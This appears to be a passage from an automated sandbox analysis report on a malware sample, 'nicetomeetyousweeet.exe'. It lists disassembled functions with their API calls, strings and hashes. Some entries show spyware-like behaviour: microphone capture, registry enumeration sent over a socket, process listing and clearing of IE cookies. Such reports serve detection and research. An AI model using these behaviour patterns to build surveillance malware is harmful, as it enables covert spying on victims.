                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                • String ID:
                                                                                • API String ID: 2829977744-0
                                                                                • Opcode ID: c4a89f2486a78fdb2d2cd6a1d115c2a82ca2a719920f1ba833c456cc9ed525cb
                                                                                • Instruction ID: a54258fdf047dca8a4b85b55c722ba27ca8ddafb940c31bd7ef433f64bdbcaf1
                                                                                • Opcode Fuzzy Hash: c4a89f2486a78fdb2d2cd6a1d115c2a82ca2a719920f1ba833c456cc9ed525cb
                                                                                • Instruction Fuzzy Hash: 4591B471E002169ADF258F64CC45EEEBBB69F18714F18066AE801E7342E73DDD42C7A1
                                                                                Function 00793C2E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 228COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: udp
                                                                                • API String ID: 0-4243565622
                                                                                • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                • Instruction ID: 41b753f7237144467f68922d8c692f43b43979dcb567498f7486d85ce90acd77
                                                                                • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                • Instruction Fuzzy Hash: 1771AA316083528FDF25CF18A49562BB7E4AF89345F14493EF885A7291D77CCE44CB92
                                                                                Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                Function 007CFA6D Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                • Instruction ID: c3119e99e28954f84ff9921a43984ad08eb77e75d3dccee17d098fa10cfcbd19
                                                                                • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                • Instruction Fuzzy Hash: 0F619E71A00209EFDB20DF68C842FAABBF6EB45710F14417EE959EB241E7399D418B50
                                                                                Function 00790D80 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 198memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00790820: SetLastError.KERNEL32(0000000D,00790D9F,?,00000000), ref: 00790826
                                                                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00790D7C), ref: 00790E2B
                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00790E91
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00790E98
                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00790FA6
                                                                                • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00790D7C), ref: 00790FD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Heap$AllocateInfoNativeProcessSystem
                                                                                • String ID: A
                                                                                • API String ID: 4001361727-520424720
                                                                                • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                • Instruction ID: abe549f5b3b5b5e3d8733aa52701a2fcd8f9e6ce9e6cfb7ca7fe2d721fb9850f
                                                                                • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                • Instruction Fuzzy Hash: AA61D470221301AFCF209F25ED85B667BA6BF84740F044429FD058B282E7BCD995CBD5
                                                                                Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                • _free.LIBCMT ref: 00444086
                                                                                • _free.LIBCMT ref: 0044409D
                                                                                • _free.LIBCMT ref: 004440BC
                                                                                • _free.LIBCMT ref: 004440D7
                                                                                • _free.LIBCMT ref: 004440EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$AllocateHeap
                                                                                • String ID: J7D
                                                                                • API String ID: 3033488037-1677391033
                                                                                • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A105
                                                                                • __fassign.LIBCMT ref: 0044A180
                                                                                • __fassign.LIBCMT ref: 0044A19B
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1C1
                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                Function 007CA32A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,007CAA9F,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 007CA36C
                                                                                • __fassign.LIBCMT ref: 007CA3E7
                                                                                • __fassign.LIBCMT ref: 007CA402
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 007CA428
                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,007CAA9F,00000000,?,?,?,?,?,?,?,?,?,007CAA9F,?), ref: 007CA447
                                                                                • WriteFile.KERNEL32(?,?,00000001,007CAA9F,00000000,?,?,?,?,?,?,?,?,?,007CAA9F,?), ref: 007CA480
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: d742a0ed7e7f80d5daee9f90daca0257aad30d4fad8407fa3c2509fb5468b32f
                                                                                • Instruction ID: df1b7cb4e595e5f869231ed3539042bb03169ed80c6863d4cdfed6709c70c7c1
                                                                                • Opcode Fuzzy Hash: d742a0ed7e7f80d5daee9f90daca0257aad30d4fad8407fa3c2509fb5468b32f
                                                                                • Instruction Fuzzy Hash: 0851E570E00249AFCB14CFA8D845FEEBBF5EF09305F14416EE959E7291E6749A40CB61
                                                                                Function 007D5C31 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID: RK}$RK}
                                                                                • API String ID: 269201875-816488649
                                                                                • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                • Instruction ID: a35b580b2bca518788b12043a512d5d37638db239dec29d6d02fe240aab0bc0b
                                                                                • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                • Instruction Fuzzy Hash: B841D431B00E05ABDB256A789CCEFAE3BB6EF41370F14021EF81896391DA7D89419271
                                                                                Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                                • String ID: TUFTUF$>G$DG$DG
                                                                                • API String ID: 3114080316-344394840
                                                                                • Opcode ID: c19cd130e875de7cfbb620ad028e3b9ac2bf3615e9ecf033c29ce016192b171c
                                                                                • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                • Opcode Fuzzy Hash: c19cd130e875de7cfbb620ad028e3b9ac2bf3615e9ecf033c29ce016192b171c
                                                                                • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                Function 0078E90A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0079B3C2: GetCurrentProcess.KERNEL32(00000003,?,?,0079A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0079B3D3
                                                                                  • Part of subcall function 0079B3C2: IsWow64Process.KERNEL32(00000000,?,?,0079A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0079B3DA
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0078E928
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0078E94C
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0078E95B
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0078EB12
                                                                                  • Part of subcall function 0079B3EE: OpenProcess.KERNEL32(00000400,00000000), ref: 0079B403
                                                                                  • Part of subcall function 0079B3EE: IsWow64Process.KERNEL32(00000000,?), ref: 0079B40E
                                                                                  • Part of subcall function 0079B5E4: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0079B5FC
                                                                                  • Part of subcall function 0079B5E4: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0079B60F
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0078EB03
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                • String ID: PgF
                                                                                • API String ID: 2180151492-654241383
                                                                                • Opcode ID: 4103c74ef064f91666f8864adad10e095dbae6404165e6ea80ccaa02d20916fc
                                                                                • Instruction ID: 9c677880bf75e432fc837be4ef9883655fe590d8cf37f6617b0176d1a2859d3c
                                                                                • Opcode Fuzzy Hash: 4103c74ef064f91666f8864adad10e095dbae6404165e6ea80ccaa02d20916fc
                                                                                • Instruction Fuzzy Hash: B6416731648244DBC325F724DD5AEEFB3E9EF94301F10456DF54A82192EF389A0AC756
                                                                                Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 1170836740-1018135373
                                                                                • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                Function 004426D4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000104), ref: 00442714
                                                                                • _free.LIBCMT ref: 004427DF
                                                                                • _free.LIBCMT ref: 004427E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: (7h$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$`=j
                                                                                • API String ID: 2506810119-3639734538
                                                                                • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                Function 00781CF5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _strftime.LIBCMT ref: 00781D3A
                                                                                  • Part of subcall function 00781E4F: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00781EBB
                                                                                • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00781DEC
                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00781E2A
                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00781E39
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                • String ID: `=G$x=G
                                                                                • API String ID: 3809562944-3004145341
                                                                                • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                                • Instruction ID: c5bc9f9543a6d7c0c8418920935c581001e513d8a6d0a48ad720ea480a79a88a
                                                                                • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                                • Instruction Fuzzy Hash: C0317E31549340DFC324FF24EC5AAAE77A8BB84312F408439F559821B2EF79994ACB56
                                                                                Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                  • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                  • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                • API String ID: 1133728706-4073444585
                                                                                • Opcode ID: 5e97071d3d386628da5085207ae9cb3dc486694a073136f893461fd25a84c48e
                                                                                • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                • Opcode Fuzzy Hash: 5e97071d3d386628da5085207ae9cb3dc486694a073136f893461fd25a84c48e
                                                                                • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                • Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                Function 007D5B6A Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 73f4216d9227424834ab683a62f21571e8b2afaadca920fe74bb7b8a40116277
                                                                                • Instruction ID: 24d0d0a4689f87ffb4dcaaffd559594d36fb5595b2754c282c0017beb782fcc1
                                                                                • Opcode Fuzzy Hash: 73f4216d9227424834ab683a62f21571e8b2afaadca920fe74bb7b8a40116277
                                                                                • Instruction Fuzzy Hash: 0D11A272618619FFCB202F75AC48E6B7B7DDB85720B10066EF816C6341EA39C90196B1
                                                                                Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                • int.LIBCPMT ref: 0040FC0F
                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                • String ID: P[G
                                                                                • API String ID: 2536120697-571123470
                                                                                • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                Function 0078FE56 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0078FE63
                                                                                • int.LIBCPMT ref: 0078FE76
                                                                                  • Part of subcall function 0078D147: std::_Lockit::_Lockit.LIBCPMT ref: 0078D158
                                                                                  • Part of subcall function 0078D147: std::_Lockit::~_Lockit.LIBCPMT ref: 0078D172
                                                                                • std::_Facet_Register.LIBCPMT ref: 0078FEB2
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0078FED8
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0078FEF4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                • String ID: P[G
                                                                                • API String ID: 2536120697-571123470
                                                                                • Opcode ID: 66d1d2f93b0a437ba6194d5bb56da3cbca8cefc802f69fb3ca8fff7099274c15
                                                                                • Instruction ID: 13bbe1a86d28adbb8ee5aa8b6bee7f4a9d3af7eb7c45b2d80bec35bd48e6b403
                                                                                • Opcode Fuzzy Hash: 66d1d2f93b0a437ba6194d5bb56da3cbca8cefc802f69fb3ca8fff7099274c15
                                                                                • Instruction Fuzzy Hash: EA11B131E40518EBCB14F7A8D84AAEEB7689F40724B200069F90567192EB78AF45C7D5
                                                                                Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
